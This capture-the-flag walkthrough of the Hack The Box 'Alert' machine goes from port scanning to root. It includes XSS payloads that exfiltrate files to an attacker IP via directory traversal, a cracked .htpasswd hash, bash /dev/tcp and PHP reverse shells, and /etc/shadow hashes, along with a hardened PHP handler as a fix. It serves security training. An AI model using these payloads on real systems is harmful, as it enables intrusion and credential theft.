HTB-Alert

Box Info

Difficulty Easy
OS Linux
IP Address 10.10.11.44

Port Scanning

# Check all open TCP
sudo rustscan 10.10.11.44 -r 1-65535 --ulimit 5000 | tee res
# Nmap scan with script on open TCP port
sudo nmap 10.10.11.44 -sCV -Pn -sT -p22,80
# Nmap scan vulnerability
sudo nmap -sT -p22,80 --script=vuln -O -Pn 10.10.11.44
# Nmap scan with UDP port
sudo nmap -sU --top-ports 20 -Pn 10.10.11.44

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
| 256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_ 256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://alert.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Update DNS

# Either edit /etc/hosts by hand or append the entry (sudo must apply to tee, not to echo)
sudo nano /etc/hosts
echo "10.10.11.44 alert.htb" | sudo tee -a /etc/hosts

Service Enumeration

80/tcp HTTP

http://alert.htb is a markdown viewer.


Directory brute force check

# The website uses PHP, so include php (and txt) extensions in the brute force
gobuster dir -u http://alert.htb -w /usr/share/wordlists/dirb/common.txt -x php,txt -t 50


So there is a messages.php that is not linked anywhere on the website; visiting it directly just returns an empty page. Is something hidden here?


Subdomain brute force check

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://alert.htb/ -H "Host: FUZZ.alert.htb" -fw 20


Here we found a statistics subdomain. Let's add it to /etc/hosts as well.

When trying to access statistics.alert.htb, it is protected by HTTP Basic Authentication as the first security layer.


File upload check

I tried uploading a pentest-monkey.php file to the server, and it returned an error saying only .md files are accepted.


Markdown viewers are often vulnerable to XSS, so let's try something simple to test it. Create a simple payload and name it test.md:

<script>
alert(1)
</script>

And the result is positive: the script executes in the viewer.


Access to whitelist page via XSS

The About Us page mentions that the web administrator is in charge of reviewing contact messages. That means we can send an XSS payload to the web admin via the "Contact Us" page, have it fetch /messages.php in the admin's browser, and send the result back to our Kali machine.

page.md

<script>
fetch("http://alert.htb/messages.php")
.then(response => response.text())
.then(data => {fetch("http://10.10.14.105:1234/?file_content=" + encodeURIComponent(data));});
</script>

Upload page.md to the Markdown viewer and obtain the share link by clicking the Share Markdown button at the bottom right. Then send that link to the administrator through the Contact Us form.


nc -lvnp 1234

The netcat listener receives the following request.


Let's URL-decode the string:


<h1>Messages</h1><ul><li><a href='messages.php?file=2024-03-10_15-48-34.txt'>2024-03-10_15-48-34.txt</a></li></ul>

This response shows there is a .txt file that can be read through messages.php, so I modified page.md as follows:

<script>
fetch("http://alert.htb/messages.php?file=2024-03-10_15-48-34.txt")
.then(response => response.text())
.then(data => {fetch("http://10.10.14.105:1234/?file_content=" + encodeURIComponent(data));});
</script>


The content of the file itself is meaningless.


Directory Traversal

Since we can abuse the XSS to read that file, what if we use it to fetch other files such as /etc/passwd? The answer is no:

<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../../../../etc/passwd")
.then(response => response.text())
.then(data => {fetch("http://10.10.14.105:1234/?file_content=" + encodeURIComponent(data));});
</script>


From the initial recon, the website runs on Apache httpd 2.4.41, so we can try to read the Apache config files via directory traversal. According to DigitalOcean, the default virtual host config lives at /etc/apache2/sites-available/000-default.conf.

# Found a better script
<script>
var url = "messages.php?file=../../../../../../../etc/apache2/sites-available/000-default.conf"
var attacker = "http://10.10.14.105:1234/exfil"
var xhr = new XMLHttpRequest()
xhr.onreadystatechange = function () {
if (xhr.readyState == XMLHttpRequest.DONE) {
fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
}
}
xhr.open("GET", url, true)
xhr.send(null)
</script>


The config file reveals the AuthUserFile path; let's repeat the same technique to obtain that file.

<script>
var url = "messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd"
var attacker = "http://10.10.14.105:1234/exfil"
var xhr = new XMLHttpRequest()
xhr.onreadystatechange = function () {
if (xhr.readyState == XMLHttpRequest.DONE) {
fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
}
}
xhr.open("GET", url, true)
xhr.send(null)
</script>


Bingo! Here we got the user albert and the password hash:

albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
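The traversal above works because messages.php hands the file parameter straight to a file read without confining it to the messages directory. As an added example that is not the box's own code, the PHP below shows a hardened version of that handler: it allow-lists the filename shape seen above (2024-03-10_15-48-34.txt), canonicalises the path and checks that it stays inside the messages directory, escapes names in the listing, and serves messages as text/plain. The directory path and the filename pattern are assumptions.

```php
<?php
// Added example, not the box's own messages.php: a hardened "?file=" handler.
// Assumed (not taken from the app's source): messages are stored as
// YYYY-MM-DD_HH-MM-SS.txt files under /var/www/alert.htb/messages.
declare(strict_types=1);

const MESSAGES_DIR = '/var/www/alert.htb/messages';

// Map a user-supplied name to a path inside MESSAGES_DIR, or null if it is
// not a plain message filename or would escape the directory.
function resolveMessagePath(string $requested, string $baseDir = MESSAGES_DIR): ?string
{
    // Allow-list the exact filename shape the app generates. This alone rejects
    // "../", absolute paths, NUL bytes and anything with a directory component.
    if (preg_match('/\A\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}\.txt\z/', $requested) !== 1) {
        return null;
    }
    // Defence in depth: canonicalise and confirm the target really sits under
    // $baseDir (catches a symlinked message file that points elsewhere).
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$file = $_GET['file'] ?? null;
if ($file === null) {
    // Listing mode: escape each filename before it becomes HTML or href content.
    echo '<h1>Messages</h1><ul>';
    foreach (glob(MESSAGES_DIR . '/*.txt') ?: [] as $entry) {
        $name = htmlspecialchars(basename($entry), ENT_QUOTES, 'UTF-8');
        echo "<li><a href='messages.php?file=$name'>$name</a></li>";
    }
    echo '</ul>';
    exit;
}

// Reject arrays (file[]=...) as well as anything the resolver refuses.
$path = is_string($file) ? resolveMessagePath($file) : null;
if ($path === null) {
    http_response_code(404);
    exit('No such message');
}
header('Content-Type: text/plain; charset=utf-8'); // never render a message as HTML
readfile($path);
```

With this handler, requests such as file=../../../../etc/apache2/sites-available/000-default.conf or file=../../var/www/statistics.alert.htb/.htpasswd return 404 instead of file contents, and the page itself can no longer be used as a file-read primitive from an XSS.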

Initiate User Foothold

Based on the hash we found in the previous step, let's identify and crack it.


hashcat -m 1600 --force albert.hash /usr/share/wordlists/rockyou.txt


The cracked password is manchesterunited.

ssh albert@alert.htb -o StrictHostKeyChecking=no 
cat user.txt


Privilege Escalation

Linpeas

Let's upload linpeas and see what we can find.

scp -o StrictHostKeyChecking=no linpeas.sh albert@alert.htb:/tmp 
chmod 755 linpeas.sh
bash linpeas.sh
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root 987 0.0 0.0 6816 3024 ? Ss 09:14 0:00 /usr/sbin/cron -f
root 999 0.0 0.0 8360 3384 ? S 09:14 0:00 _ /usr/sbin/CRON -f
root 1005 0.0 0.0 2608 600 ? Ss 09:14 0:00 | _ /bin/sh -c /root/scripts/php_bot.sh
root 1007 0.0 0.0 6892 3196 ? S 09:14 0:00 | _ /bin/bash /root/scripts/php_bot.sh
root 1012 0.0 0.0 2636 732 ? S 09:14 0:00 | _ inotifywait -m -e modify --format %w%f %e /opt/website-monitor/config
root 1013 0.0 0.0 6892 1904 ? S 09:14 0:04 | _ /bin/bash /root/scripts/php_bot.sh
root 44980 0.0 0.0 5476 576 ? S 14:36 0:00 | _ /usr/bin/sleep 3
root 1000 0.0 0.0 8360 3376 ? S 09:14 0:00 _ /usr/sbin/CRON -f
root 1006 0.0 0.0 2608 592 ? Ss 09:14 0:00 _ /bin/sh -c /root/scripts/xss_bot.sh
root 1008 0.0 0.0 6892 3204 ? S 09:14 0:00 _ /bin/bash /root/scripts/xss_bot.sh
root 1009 0.0 0.0 2636 732 ? S 09:14 0:00 _ inotifywait -m -e create --format %w%f %e /var/www/alert.htb/messages --exclude 2024-03-10_15-48-34.txt
root 1010 0.0 0.0 6892 1916 ? S 09:14 0:00 _ /bin/bash /root/scripts/xss_bot.sh
root 995 0.0 0.6 207256 26328 ? Ss 09:14 0:00 /usr/bin/php -S 127.0.0.1:8080 -t /opt/website-monitor
root 2569 0.0 0.0 2608 592 ? S 09:39 0:00 _ sh -c /bin/bash -c 'bash -i >/dev/tcp/10.10.14.29/6969 0>&1'
root 2570 0.0 0.0 6892 3140 ? S 09:39 0:00 _ /bin/bash -c bash -i >/dev/tcp/10.10.14.29/6969 0>&1
root 2571 0.0 0.1 7236 4012 ? S 09:39 0:00 _ bash -i
root 1003 0.0 0.5 396748 21420 ? Ssl 09:14 0:06 /usr/bin/python3 /usr/bin/fail2ban-server -xf start

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/opt/website-monitor/config/configuration.php
/opt/website-monitor/monitors/alert.htb
/opt/website-monitor/monitors/statistics.alert.htb

╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 18913 Mar 10 2024 /var/backups/backup.zip

Here we found an interesting port: from the process list we can see a website monitor running as root on port 8080, bound to localhost only. We can use SSH local port forwarding to reach it from our Kali machine.

ssh -L 8080:127.0.0.1:8080 albert@alert.htb


Under the /opt/website-monitor directory there is a monitors folder with 777 permissions, owned by root.


Create a PHP reverse shell in this folder; since the PHP built-in server on port 8080 runs as root with /opt/website-monitor as its document root, any file dropped there is executed as root when requested.

cute.php

<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.105/80 0>&1'"); ?>

Execute the reverse shell by requesting the file through the forwarded port (the listener port must match the port used in cute.php):

nc -lvnp 8888
curl http://127.0.0.1:8080/monitors/cute.php


Initiate Root Foothold

# Upgrade TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'

cd
ls
cat root.txt


As root we can also read /etc/shadow:

root:$6$gSjyQo8nJFMsegNG$jRRGms4KAq1FGTXwBJl236Ui5OKRtmaM3k8nkXuvduPXnhhaT/ZCYHHYO3GxhUAik1NaFYlBGaQZBrzQHgOhc/:19791:0:99999:7:::
albert:$6$ITP6P5Et1oVKsi7t$kEwgQPb4LUVcYb9MDHklHWKwDPvE6l7TGBUZogMvPoHUDt2IZ0ONlWODbsiTFdwd7SkYUNHGA0QS.Bnd6/tsp0:19822:0:99999:7:::
david:$6$oYlviwCQ3SMghmp.$95V3x9QjaD5GU8yoFsb8ufq9GrJ7PtcMAilTYtiNN2RZsVG0qgiWXUdlDURqdE84Nk2T11F4BpJXz3FbEK3bC1:20008:0:99999:7:::

References

Simple Data Exfiltration Through XSS